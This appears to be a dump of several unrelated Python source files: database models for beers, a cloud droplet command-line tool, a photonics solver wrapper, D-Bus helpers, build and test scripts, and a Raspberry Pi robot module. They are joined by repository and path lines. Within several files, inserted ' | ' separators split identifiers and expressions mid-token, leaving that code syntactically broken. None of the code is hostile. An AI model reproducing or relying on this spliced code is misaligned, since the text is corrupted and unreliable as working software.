style = relationship('BeerStyle', lazy=False)
score_overall = sa.Column('score_overall', sa.Float)
score_style = sa.Column('score_style', sa.Float)
abv = sa.Column('abv', sa.Float)
ibu = sa.Column('ibu', sa.Float)
brewery_id = sa.Column(
'brewery_id',
sa.Integer,
sa.ForeignKey('rb_brewery.id'),
nullable=False
)
brewery = relationship('RatebeerBrewery', lazy=False)
pol_beers = relationship(
'PoletBeer',
lazy=False,
back_populates='ratebeer'
)
def __init__(self):
pass
@property
def url(self):
return ratebeer_url(self.id, self.shortname)
def serialize(self):
return {
'id': self.id,
'name': self.name,
'shortname': self.shortname,
'alias': self.alias,
'retired': self.retired,
'style_id': self.style_id,
'style': self.style,
'score_overall': self.score_overall,
'score_style': self.score_style,
'abv': self.abv,
'ibu': self.ibu,
'url': self.url,
'brewery': self.brewery,
}
def get_list_response(self, extra_data=None):
pol_beer = self.pol_beers[0] if len(self.pol_beers) > 0 else None
res = {
'name': self.name,
'brewery': self.brewery.name,
'brewery_id': self.brewery.id,
'style': self.style.name,
'style_id': self.style.id,
'abv': self.abv,
'price': pol_beer.price if pol_beer else None,
'score_overall': self.score_overall,
'score_style': self.score_style,
'has_rb': True,
'id': self.id,
'pol_id': pol_beer.id if pol_beer else None,
}
if isinstance(extra_data, dict):
res.update(extra_data)
return res
class RatebeerBrewery(Base):
__tablename__ = 'rb_brewery'
id = sa.Column('id', sa.Integer, primary_key=True)
name = sa.Column('name', sa.Unicode(255))
country_id = sa.Column(
'country',
sa.Integer,
sa.ForeignKey('countries_no.rb_id')
)
country = relationship('Country', lazy=False)
subregion = sa.Column('subregion', sa.Integer)
city = sa.Column('city', sa.Unicode(255))
def __init__(self):
pass
def get_list_response(self, count=None):
return {
'id': self.id,
'name': self.name,
'country': self.country,
'num_beers_polet': count
}
class PoletBeer(Base):
__tablename__ = 'pol_beer'
id = sa.Column('id', sa.Integer, primary_key=True)
name = sa.Column('name', sa.Unicode(255))
store_category = sa.Column('store_category', sa.Unicode(100))
produktutvalg = sa.Column('produktutvalg', sa.Unicode(100))
producer = sa.Column('producer', sa.Unicode(100))
distributor = sa.Column('distributor', sa.Unicode(100))
varenummer = sa.Column('varenummer', sa.BigInteger)
abv = sa.Column('abv', sa.Float)
volume = sa.Column('volume', sa.Float)
color = sa.Column('color', sa.Unicode(100))
smell = sa.Column('smell', sa.Unicode(100))
taste = sa.Column('taste', sa.Unicode(100))
method = sa.Column('method', sa.Unicode(255))
cork_type = sa.Column('cork_type', sa.Unicode(100))
packaging_type = sa.Column('packaging_type', sa.Unicode(100))
price = sa.Column('price', sa.Float)
country = sa.Column('country', sa.Unicode(100))
district = sa.Column('district', sa.Unicode(100))
subdistrict = sa.Column('subdistrict', sa.Unicode(100))
url = sa.Column('url', sa.Unicode(100))
vintage = sa.Column('vintage', sa.Unicode(100))
ingredients = sa.Column('ingredients', sa.Unicode(255))
pairs_with_1 = sa.Column('pairs_with_1', sa.Unicode(255))
pairs_with_2 = sa.Column('pairs_with_2', sa.Unicode(255))
pairs_with_3 = sa.Column('pairs_with_3', sa.Unicode(255))
storage_notes = sa.Column('storage_notes', sa.Unicode(255))
sweetness = sa.Column('sweetness', sa.Integer)
freshness = sa.Column('freshness', sa.Integer)
bitterness = sa.Column('bitterness', sa.Integer)
richness = sa.Column('richness', sa.Integer)
ratebeer_id = sa.Column(
'ratebeer_id',
sa.Integer,
sa.ForeignKey('rb_beer.id'),
nullable=True
)
ratebeer = relationship(
'RatebeerBeer',
lazy=False,
back_populates='pol_beers'
)
def __init__(self):
pass
def get_list_response(self, extra_data=None):
has_rb = self.ratebeer is not None
res = {
'name': self.ratebeer.name if has_rb else self.name,
'brewery': self.ratebeer.brewery.name if has_rb else self.producer,
'brewery_id': self.ratebeer.brewery.id if has_rb else None,
'style': self.ratebeer.style.name if has_rb else None,
'style_id': self.ratebeer.style.id if has_rb else None,
'abv': self.ratebeer.abv if has_rb else None,
'price': self.price,
'score_overall': self.ratebeer.score_overall if has_rb else None,
'score_style': self.ratebeer.score_style if has_rb else None,
'has_rb': has_rb,
'id': self.id,
}
if isinstance(extra_data, dict):
res.update(extra_data)
return res
def serialize(self):
return {
'id': self.id,
'name': self.name,
'store_category': self.store_category,
'produktutvalg': self.produktutvalg,
'producer': self.producer,
'distributor': self.distributor,
'varenummer': self.varenummer,
'abv': self.abv,
'volume': self.volume,
'color': self.color,
'smell': self.smell,
'taste': self.taste,
'method': self.method,
'cork_type': self.cork_type,
'packaging_type': self.packaging_type,
'price': self.price,
'country': self.country,
'district': self.district,
'subdistrict': self.subdistrict,
'url': self.url,
'vintage': self.vintage,
'ingredients': self.ingredients,
'pairs_with_1': self.pairs_with_1,
'pairs_with_2': self.pairs_with_2,
'pairs_with_3': self.pairs_with_3,
'storage_notes': self.storage_notes,
'sweetness': self.sweetness,
'freshness': self.freshness,
'bitterness': self.bitterness,
'richness': se |
mvanorder/dosh | doshlib/commands/__init__.py | Python | mit | 2,196 | 0.015027 | import doshlib
import pprint
import dateutil.parser as dp
def help(command):
print "listdroplets"
print "dropletup <droplet ID>"
print "dropletdown <droplet ID>"
print "dropletsnapshots <droplet ID>"
def invalid(command):
print "Invalid command: " + command
def listdroplets(args):
result = doshlib.client.droplets.all()
row = ['ID','Name','Status']
print("{: >10} {: >40} {: >10}".format(*row))
for i in result['droplets']:
row = [i | ['id'],i['name'],i['status']]
| print("{: >10} {: >40} {: >10}".format(*row))
def rebootdroplet(command):
print('not implimented yet')
def dropletup(command):
droplet_id = int(command.split()[1])
if doshlib.isdroplet(int(droplet_id)):
status = doshlib.client.droplets.get(droplet_id)['droplet']['status']
if status == 'off':
result = doshlib.client.droplets.power_on(droplet_id)
print result
else:
print "Droplet is currently on. Please power it off to run this event."
else:
print "Invalid droplet ID:",droplet_id
def dropletdown(command):
droplet_id = int(command.split()[1])
if doshlib.isdroplet(int(droplet_id)):
status = doshlib.client.droplets.get(droplet_id)['droplet']['status']
if status == 'off':
print "Droplet is alreday off."
else:
result = doshlib.client.droplets.power_off(droplet_id)
print result
else:
print "Invalid droplet ID:",droplet_id
def dropletsnapshots(command):
droplet_id = int(command.split()[1])
if doshlib.isdroplet(int(droplet_id)):
snapshots = doshlib.client.droplets.get_droplet_snapshots(droplet_id)['snapshots']
row = ['Created at','Disto','ID','Min disk size','Name','Public','Regions']
print("{: >20} {: >10} {: >10} {: >15} {: >20} {: >10} {: >10}".format(*row))
for i in snapshots:
row = [str(dp.parse(i['created_at'])),i['distribution'],i['id'],i['min_disk_size'],i['name'],i['public'],i['regions']]
print("{: >20} {: >10} {: >10} {: >15} {: >20} {: >10} {: >10}".format(*row))
else:
print "Invalid droplet ID:",droplet_id
|
morris254/polymode | Polymode/ExternalSolvers.py | Python | gpl-3.0 | 14,250 | 0.009614 | # _*_ coding=utf-8 _*_
"""
Solver class to interface with JCMsuite
"""
import os,sys,logging
import Waveguide, Modes
from numpy import *
from .Solver import Solve
class JCMWaveSolver(Solve):
'''
External solver class for the JCMSuite solvers
supply the project_path where the files for the solver will be created
and the main_path where the JCMsuite is installed
'''
jcmwave = None
numthreads = 1
shape_refinement = 3
wg_domain_refinement = 3
grid_refinements = 1
fem_degree = 3
path = "."
results_path = "project_results"
layout_filename = "layout.jcm"
material_filename = "materials.jcm"
triangulator_filename = "triangulator.jcm"
project_filename = "project.jcmp"
def __init__(self, wg, project_path=".", main_path=None, numthreads=1):
self.path = project_path
self.numthreads = numthreads
#Check path
if not (os.path.isdir(project_path) and os.access(project_path, os.W_OK)):
logging.error("Project path does not exist!")
#Append python path if specified
if main_path is not None:
sys.path.append(os.path.join(main_path,"ThirdPartySupport/Python"))
#Try to load the JCM python interface
try:
self.jcmwave = __import__("jcmwave")
except ImportError:
import traceback
result = traceback.format_exc()
logging.error("Couldn't import jcmwave interface!")
logging.info("%s" % result)
#Run the rest of the configuration
Solve.__init__(self,wg)
def setup(self, geo_accuracy=1, refinement_levels=1, tol=1e-8, xy_domain=False):
self.wg_domain_xy = xy_domain
self.shape_refinement = geo_accuracy
self.wg_domain_refinement = 1
self.grid_refinements = refinement_levels
#Create wg file
self.create_materials_list()
self.export_wg(domainxy=self.wg_domain_xy)
#Create triangulation
self.export_triangulation(view=0)
#Clear mode list
self.modes = []
def create_materials_list(self):
#Start material list:
material_id = 1
#Add waveguide material, and internal and external materials
self.materials = {}
self.materials[self.wg.material] = material_id
#Also update zorder
self. | zorder_min = inf
for shape in self.wg.shapes:
if shape.material not in self.materials:
material_id += 1
self.materials[shape.material]= material_id
self.zorder_min = m | in(shape.zorder, self.zorder_min)
return self.materials
def export_wg(self, domainxy=False, sectors=None):
'''
Export the internal PolyMode waveguide shapes to a JCMSuite file
'''
if sectors is None:
sectors = self.wg.symmetry
pml_sf = 2.0
wglims = self.wg.extents(xy=domainxy)
if domainxy:
Cx = (wglims[1]+wglims[0])/2; Cy = (wglims[3]+wglims[2])/2
Dx = wglims[1]-wglims[0]; Dy = wglims[3]-wglims[2]
wg_domain_shape = "Parallelogram"
wg_domain_segment_labels = ["South", "West", "East", "North"]
wg_domain_size = "SideLengthA = %g\n SideLengthB = %g\n" % (Dx,Dy)
wg_domain_center = "GlobalPositionX = %g\n GlobalPositionY = %g\n" % (Cx,Cy)
pml_type = "NormalConstruction"
else:
wg_domain_shape = "Circle"
wg_domain_segment_labels = ["South", "West", "East", "North"]
wg_domain_size = "Radius = %g\n" % wglims[1]
wg_domain_center = "GlobalPositionX = %g\n GlobalPositionY = %g\n" % (0,0)
pml_type = "RadialConstruction"
wg_material_id = self.materials[self.wg.material]
quad_construction = \
""" QuadConstruction {
RadialScalingFactor = %g
QuadConstructionType = %s
MaterialId = %d
}""" % (pml_sf, pml_type, wg_material_id)
with open(os.path.join(self.path,self.layout_filename), "w") as jcmfile:
jcmfile.write("Layout {\n")
jcmfile.write(' Name = "Polymode Layout"\n')
jcmfile.write(" UnitOfLength = %e\n" % 1e-6)
#Computational domain
jcmfile.write(" %s {\n" % wg_domain_shape)
jcmfile.write(' Name = "Waveguide"\n')
jcmfile.write(" %s" % wg_domain_size)
jcmfile.write(" %s" % wg_domain_center)
jcmfile.write(" MaterialId = %d\n" % wg_material_id)
jcmfile.write(" Priority = -1\n")
jcmfile.write(" RefineAll = %d\n" % self.wg_domain_refinement)
for ii in range(4):
jcmfile.write(" BoundarySegment {\n")
jcmfile.write(" Segment = %s\n" % wg_domain_segment_labels[ii])
jcmfile.write(" BoundaryClass = TransparentBoundary\n")
jcmfile.write(" %s\n" % quad_construction)
jcmfile.write(" }\n")
jcmfile.write(" }\n")
#Save object for each shape
for ii,shape in enumerate(self.wg.shapes):
for kk in range(sectors):
krotate = kk*2*pi/self.wg.symmetry
#If shape overlaps the origin then don't copy it .. JCMgeo can complain
rmin,rmax,_,_ = shape.extents()
if rmin==0 and kk>0:
continue
#Rotated center
r0,phi0 = shape.get_center()
centerxy = array([r0*cos(phi0+krotate), r0*sin(phi0+krotate)])
if isinstance(shape, Waveguide.Circle):
jcmfile.write(" Circle {\n")
jcmfile.write(' Name = "Circle %d.%d"\n' % (ii,kk))
jcmfile.write(" Radius = %g\n" % shape.radius)
jcmfile.write(" RefineAll = %s\n" % self.shape_refinement)
elif isinstance(shape, Waveguide.Rectangle):
jcmfile.write(" Parallelogram {\n")
jcmfile.write(' Name = "Rectangle %d.%d"\n' % (ii,kk))
jcmfile.write(" SideLengthA = %g\n SideLengthB = %g\n" % shape.axes)
jcmfile.write(" RefineAll = %s\n" % self.shape_refinement)
elif isinstance(shape, Waveguide.Polygon):
jcmfile.write(" Polygon {\n")
jcmfile.write(' Name = "Polygon %d.%d"\n' % (ii,kk))
jcmfile.write(" Points = [\n")
xypoints = shape.to_nodelist(rotate=krotate)
#Ensure shapes are "open"
if xypoints[-1]==xypoints[0]:
xypoints=xypoints[:-1]
#Transform points - we should fix this to work in PolyMode itself
for xy in xypoints:
xy = array(xy)-centerxy
jcmfile.write(" %g %g\n" % tuple(xy))
jcmfile.write(" ]\n")
else:
print "Shape %s couldn't be converted" % shape
break
jcmfile.write(" GlobalPositionX = %g\n" % centerxy[0])
jcmfile.write(" GlobalPositionY = %g\n" % centerxy[1])
jcmfile.write(" MaterialId = %d\n" % self.materials[shape.material])
jcmfile.write(" Priority = %g\n" % (shape.zorder-self.zorder_min+1))
jcmfile.write(" }\n") #Close shape
jcmfile.write("}\n") #Close Layout
def export_materials(self, wl):
#Write materials:
with open(os.path.join(self.path,self.material_filename), "w") as jcmfile:
for mat in self.materials:
#Calulate permittivity at wavelength
eps = mat.index(wl)**2
jcmfile.write("Material {\n")
jc |
smattis/BET-1 | examples/parallel_and_serial_sampling/serial_serial.py | Python | gpl-3.0 | 927 | 0.001079 | # Copyright (C) 2016 The BET Development Team
# -*- coding: utf-8 -*-
# This demonstrates how to use BET in serial to sample a serial external model.
# run by calling "python serial_serial.py"
import os
import subprocess
import scipy.io as sio
import bet.sampling.basicSampling as bsam
def lb_model(inp | ut_data):
io_file_name = "io_file"
io_mdat = dict()
i | o_mdat['input'] = input_data
# save the input to file
sio.savemat(io_file_name, io_mdat)
# run the model
subprocess.call(['python', 'serial_model.py', io_file_name])
# read the output from file
io_mdat = sio.loadmat(io_file_name)
output_data = io_mdat['output']
return output_data
my_sampler = bsam.sampler(lb_model)
my_discretization = my_sampler.create_random_discretization(sample_type='r',
input_obj=4, savefile="serial_serial_example", num_samples=100)
|
mvidner/cnetworkmanager | dbusclient/__init__.py | Python | gpl-2.0 | 6,611 | 0.004084 | "Convenience wrappers around dbus-python"
import dbus
import functools
# TODO rename to adaptors
from func import Adaptor, MethodAdaptor, PropertyAdaptor, SignalAdaptor
def object_path(o):
"""Return the object path of o.
If o is a proxy object, use its appropriate attribute.
Otherwise assume that o already is an object path.
"""
if isinstance(o, dbus.proxies.ProxyObject):
return o.object_path
# hope it is ok
return o
class DBusMio(dbus.proxies.ProxyObject):
"""Multi-interface object.
Will look into introspection data to find which interface
to use for a method or a property, obviating the need for
dbus.proxies.Interface.
If introspection is not available, provide default_interface
to the constructor.
BUGS: 1st method call will block with introspection"""
API_OPTIONS = {
"byte_arrays": True,
"utf8_strings": True,
}
def __init__(self, conn=None, bus_name=None, object_path=None, introspect=True, follow_name_owner_changes=False, **kwargs):
"""Constructor.
kwargs may contain default_interface, to be used
if introspection does not provide it for a method/property
"""
# FIXME common for this class, all classes?
self.__default_interface = kwargs.pop("default_interface", None)
# print "OP:", object_path
super(DBusMio, self).__init__(conn, bus_name, object_path, introspect, follow_name_owner_changes, **kwargs)
def __getattr__(self, name):
"""Proxied DBus methods.
Uses introspection or default_interface to find the interface.
"""
# TODO cache
# iface = self._interface_cache.get(name)
# if iface == None:
iface = self.__default_interface
# _introspect_method_map comes from ProxyObject
# But it will be empty until the async introspection finishes
self._introspect_block() # FIXME makeit work with async methods
methods = self._introspect_method_map.keys()
for im in methods:
(i, m) = im.rsplit(".", 1)
if m == name:
iface = i
# print "METHOD %s INTERFACE %s" %(name, iface)
callable = super(DBusMio, self).__getattr__(name)
return functools.partial(callable, dbus_interface=iface, **DBusMio.API_OPTIONS)
# properties
def __getitem__(self, key):
"""Proxies DBus properties as dictionary items.
a = DBusMio(...)
p = a["Prop"]
Uses default_interface (because dbus.proxies.ProxyObject
does not store introspection data for properties, boo. TODO.)
"""
iface = self.__default_interface # TODO cache
# TODO _introspect_property_map
pmi = dbus.Interface(self, "org.freedesktop.DBus.Properties")
return pmi.Get(iface, key, **DBusMio.API_OPTIONS)
def __setitem__(self, key, value):
"""Proxies DBus properties as dictionary items.
a = DBusMio(...)
a["Prop"] = "Hello"
Uses default_interface | (because dbus.proxies.ProxyObject
does not store introspection data for properties, boo. TODO.)
"""
iface = self.__default_interface # TODO cache
# TODO _introspect_property_map
pmi = dbus.Interface(self, "org.freedesktop.DBus.Properties")
return pmi.Set(iface, key, value, **DBusMio.API_OPTIONS)
def _mklist(x):
| """Return a list.
Tuples are made into lists, everything else a singleton list.
"""
if isinstance(x, list):
return x
elif isinstance(x, tuple):
return [i for i in x]
else:
return [x]
class DBusClient(DBusMio):
"""
"""
_adaptors = {
"methods": {},
"signals": {},
"properties": {},
}
@classmethod
def _get_adaptor(cls, kind, name):
# print "GET", cls, kind, name
try:
a = cls._adaptors[kind][name]
# print ">", a
# TODO cache somehow?
return a
except KeyError:
scls = cls.__mro__[1] # can use "super"? how?
try:
return scls._get_adaptor(kind, name)
except AttributeError: # no _get_adaptor there
raise KeyError(":".join((kind, name)))
@classmethod
def _add_adaptor(cls, kind, name, adaptor):
# print "ADD", cls, kind, name, adaptor
assert(isinstance(adaptor, Adaptor))
cls._adaptors[kind][name] = adaptor
@classmethod
def _add_adaptors_dict(cls, andict):
"""
a nested dictionary of kind:name:adaptor,
"""
if not cls.__dict__.has_key("_adaptors"):
# do not use inherited attribute
cls._adaptors = {"methods":{}, "properties":{}, "signals":{}}
for section in cls._adaptors.keys():
secsource = andict.pop(section, {})
for name, adaptor in secsource.iteritems():
cls._add_adaptor(section, name, adaptor)
assert len(andict) == 0
# print "AA", cls, cls._adaptors
@classmethod
def _add_adaptors(cls, **kwargs):
"""kwargs: a *flat* dictionary of name: adaptor"""
adict = {"methods":{}, "properties":{}, "signals":{}}
for k, v in kwargs.iteritems():
kind = v.kind()
adict[kind][k] = v
cls._add_adaptors_dict(adict)
def __getattr__(self, name):
"Wrap return values"
callable = super(DBusClient, self).__getattr__(name)
try:
adaptor = self._get_adaptor("methods", name)
return adaptor.adapt(callable)
except KeyError:
return callable
# properties
def __getitem__(self, key):
value = super(DBusClient, self).__getitem__(key)
try:
adaptor = self._get_adaptor("properties", key)
return adaptor.adapt(value)
except KeyError:
return value
def __setitem__(self, key, value):
try:
adaptor = self._get_adaptor("properties", key)
value = adaptor.adapt_write(value)
except KeyError:
pass
return super(DBusClient, self).__setitem__(key, value)
# signals
# overrides a ProxyObject method
def _connect_to_signal(self, signame, handler, interface=None, **kwargs):
"Wrap signal handler, with arg adaptors"
# TODO also demarshal kwargs
adaptor = self._get_adaptor("signals", signame)
wrap_handler = adaptor.adapt(handler)
return self.connect_to_signal(signame, wrap_handler, interface, **kwargs)
|
RentennaDev/partial | partial/application.py | Python | mit | 1,463 | 0.004101 | from werkzeug.exceptions import HTTPException
from werkzeug.wsg | i import SharedDataMiddleware
from partial import routing, scanner
from partial.request import Request
class Application(object):
def dispatch_request(self, request):
scanner.LOCAL.request = request
adapter = scanner.GLOBAL['routemap'].bind_to_environ(request.environ)
try: endpoint, args = adapter.match()
except HTTPException as e: return e
(megamodule, clsName, methodName) = endpoint.split(".")
cls = scanner.getClass(megamodule, clsName)
| view = cls(request)
response = view.dispatch(methodName, args)
del scanner.LOCAL.request
return response
def wsgi_app(self, environ, start_response):
request = Request(environ)
response = self.dispatch_request(request)
request.session.save_cookie(response)
return response(environ, start_response)
def __call__(self, environ, start_response):
return self.wsgi_app(environ, start_response)
def createApp(serveStatic, megamodules=None):
scanner.scanRoutes(megamodules)
app = Application()
if serveStatic:
app.wsgi_app = SharedDataMiddleware(app.wsgi_app, {
'/resource': routing.resourcepath("")
})
return app
def runSimple(package):
scanner.scan(package, True)
app = createApp(True)
from werkzeug.serving import run_simple
run_simple('localhost', 4000, app) |
EmanueleCannizzaro/scons | test/WhereIs.py | Python | mit | 4,794 | 0.005632 | #!/usr/bin/env python
#
# Copyright (c) 2001 - 2016 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "test/WhereIs.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog"
import os
import sys
import TestSCons
test = TestSCons.TestSCons()
subdir_SConscript = os.path.join('subdir', 'SConscript')
sub1_xxx_exe = test.workpath('sub1', 'xxx.exe')
sub2_xxx_exe = test.workpath('sub2', 'xxx.exe')
sub3_xxx_exe = test.workpath('sub3', 'xxx.exe')
sub4_xxx_exe = test.workpath('sub4', 'xxx.exe')
test.subdir('subdir', 'sub1', 'sub2', 'sub3', 'sub4')
if sys.platform != 'win32':
test.write(sub1_xxx_exe, "\n")
os.mkdir(sub2_xxx_exe)
test.write(sub3_xxx_exe, "\n")
os.chmod(sub3_xxx_exe, 0777)
test.write(sub4_xxx_exe, "\n")
os.chmod(sub4_xxx_exe, 0777)
env_path = os.environ['PATH']
pathdirs_1234 = [ test.workpath('sub1'),
test.workpath('sub2'),
test.workpath('sub3'),
test.workpath('sub4'),
] + env_path.split(os.pathsep)
pathdirs_1243 = [ test.workpath('sub1'),
test.workpath('sub2'),
test.workpath('sub4'),
test.workpath('sub3'),
] + env_path.split(os.pathsep)
test.write('SConstruct', """
SConscript('%s')
env = Environment()
print WhereIs('xxx.exe')
print WhereIs('xxx.exe', %s)
print env.WhereIs('xxx.exe', %s)
print WhereIs('xxx.exe', %s)
print WhereIs('xxx.exe', %s)
print WhereIs('xxx.exe', %s, reject=%s)
env.Replace( XXXNAME='xxx.exe' )
print env.WhereIs( '$XXXNAME', %s )
""" % (subdir_SConscript,
repr(os.pathsep.join(pathdirs_1234)),
repr(os.pathsep.join(pathdirs_1243)),
repr(pathdirs_1234),
repr(pathdirs_1243),
repr(pathdirs_1243),
repr(sub4_xxx_exe),
repr(os.pathsep.join(pathdirs_1243)),
))
t | est.wr | ite(subdir_SConscript, """
env = Environment()
print WhereIs('xxx.exe')
print WhereIs('xxx.exe', %s)
print env.WhereIs('xxx.exe', %s)
print WhereIs('xxx.exe', %s)
print WhereIs('xxx.exe', %s)
""" % (repr(os.pathsep.join(pathdirs_1234)),
repr(os.pathsep.join(pathdirs_1243)),
repr(pathdirs_1234),
repr(pathdirs_1243),
))
os.environ['PATH'] = os.pathsep.join(pathdirs_1234)
expect = [ test.workpath(sub3_xxx_exe),
test.workpath(sub3_xxx_exe),
test.workpath(sub4_xxx_exe),
test.workpath(sub3_xxx_exe),
test.workpath(sub4_xxx_exe),
test.workpath(sub3_xxx_exe),
test.workpath(sub3_xxx_exe),
test.workpath(sub4_xxx_exe),
test.workpath(sub3_xxx_exe),
test.workpath(sub4_xxx_exe),
test.workpath(sub3_xxx_exe),
test.workpath(sub4_xxx_exe)
]
test.run(arguments = ".",
stdout = test.wrap_stdout(read_str = "\n".join(expect) + "\n",
build_str = "scons: `.' is up to date.\n"))
os.environ['PATH'] = os.pathsep.join(pathdirs_1243)
expect = [ test.workpath(sub4_xxx_exe),
test.workpath(sub3_xxx_exe),
test.workpath(sub4_xxx_exe),
test.workpath(sub3_xxx_exe),
test.workpath(sub4_xxx_exe),
test.workpath(sub4_xxx_exe),
test.workpath(sub3_xxx_exe),
test.workpath(sub4_xxx_exe),
test.workpath(sub3_xxx_exe),
test.workpath(sub4_xxx_exe),
test.workpath(sub3_xxx_exe),
test.workpath(sub4_xxx_exe)
]
test.run(arguments = ".",
stdout = test.wrap_stdout(read_str = "\n".join(expect) + "\n",
build_str = "scons: `.' is up to date.\n"))
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
lento/cortex | test/IECore/IgnoredExceptionsTest.py | Python | bsd-3-clause | 2,674 | 0.032536 | ##########################################################################
#
# Copyright (c) 2010, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# | promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT S | HALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
from __future__ import with_statement
import unittest
import IECore
class IgnoredExceptionsTest( unittest.TestCase ) :
def test( self ) :
def f( toRaise, toIgnore ) :
with IECore.IgnoredExceptions( toIgnore ) :
raise toRaise
self.assertRaises( RuntimeError, f, RuntimeError, KeyError )
self.assertRaises( RuntimeError, f, RuntimeError, ( KeyError, IndexError ) )
f( KeyError, KeyError )
f( KeyError, ( KeyError, IndexError ) )
f( IndexError, ( KeyError, IndexError ) )
c = IECore.CompoundObject()
with IECore.IgnoredExceptions( KeyError ) :
c["d"]
with IECore.IgnoredExceptions( Exception ) :
c["d"]
p = IECore.Parameterised( "" )
with IECore.IgnoredExceptions( Exception ) :
p["d"]
def testNoExceptions( self ) :
with IECore.IgnoredExceptions( Exception ) :
pass
if __name__ == "__main__":
unittest.main()
|
safwanrahman/readthedocs.org | fabfile.py | Python | mit | 979 | 0 | from fabric.api import lcd, local
from fabric.decorators import | runs_once
import os
fabfile_dir = os.path.dirname(__file__)
def i18n_push_source():
"""rebuild and push the source language to transifex"""
with lcd('readthedocs'):
local('rm -rf rtd_tests/tests/builds/')
local('django-admin makemes | sages -l en')
local('tx push -s')
local('django-admin compilemessages -l en')
def i18n_pull():
"""pull the updated translation from transifex"""
with lcd('readthedocs'):
local('rm -rf rtd_tests/tests/builds/')
local('tx pull -f ')
local('django-admin makemessages --all')
local('django-admin compilemessages')
def i18n_docs():
with lcd('docs'):
# Update our tanslations
local('tx pull -a')
local('sphinx-intl build')
# Push new ones
local('make gettext')
local('tx push -s')
@runs_once
def spider():
local('patu.py -d1 readthedocs.org')
|
alex-Symbroson/BotScript | BotScript/res/RaspiBot.py | Python | mit | 4,428 | 0.007453 | #!/usr/bin/python3.6
# initialized correctly
ISBOT = True
# object containing components
objs = {}
def warn(msg, type):
warnings.warn(msg, type)
try:
import warnings, raspibot, RPi.GPIO as GPIO
from serial import Serial, PARITY_EVEN
from smbus import SMBus
from time import sleep
# create components
objs = {
"Button1": raspibot.Button(13, 26, 23),
"Button2": raspibot.Button(19, 20, 24),
"Button3": raspibot.Button(16, 21, 25),
"Display": raspibot.Display(),
"ADC": raspibot.ADC(SMBus(1)),
"Attiny": raspibot.AttinyProtocol(Serial('/dev/ttyAMA0', 4800, 8, PARITY_EVEN, 2))
}
# initialize components
obj = objs["Display"]
# obj.clear()
obj.init()
obj.cursor_goto_xy(0, 0)
except ImportError as e:
ISBOT = False
warn("\n\033[1;33mraspibot module couldnt be loaded:\033[0;33m\n" + str(e) + "\033[0;37m", Warning)
# Methode available without botlib
class BaseMethods:
def cleanupGPIO(_):
for key in objs:
if hasattr(objs[key], "cleanup"): objs[key].cleanup()
GPIO.cleanup()
def isBot(_): return ISBOT
# remove values with greatest difference and calc arithmetic mean
def arith(_, values, remove=0):
arm = sum(values) / len(values)
# calc difference med <-> values
diff = [abs(val - arm) for val in values]
# remove elements with greatest difference
for _ in range(remove):
i = diff.index(max(diff))
values.pop(i)
diff.pop(i)
return sum(values) / len(values)
# arithmetic mean from 4 of 6 measured sensor values, one dummy measure
def getSensor(self, foo):
return self.arith([foo() for _ in range(7)][1:], 2)
if ISBOT:
class _Methods(BaseMethods):
def cleanup(self):
self.stopMotors()
self.stopBuzzer()
self.cleanupGPIO()
# Display
# writeLCD(test, x, y) = ("text", [0 - 15], [0 - 1])
def writeLCD(_, s, x = None, y = None):
if None not in (x, y):
objs["Display"].cursor_goto_xy(int(x), int(y))
objs["Display"].write(s)
# take defined functions if no conversion / args required
clearLCD = objs["Display"].clear # ()
# Serial (Attiny)
# setMotors(left right) = ([0 - 100], [0 - 100])
setMotors = objs["Attiny"].set_motors
# setBuzzer(frequency, duration , volume )
# ([0 - | 2^16], [0 - 2^16], [0 - 100])
setBuzzer = objs["Attiny"].set_buzzer
resetEncoders = objs["Attiny"].reset_encoders # ()
stopMotors = objs["Attiny"].stop_motors # ()
| stopBuzzer = objs["Attiny"].stop_buzzer # ()
# getEncoders -> [left, right] = ([0 - 100], [0 - 100])
def getEncoders(_, opt = None):
vals = objs["Attiny"].get_encoders()
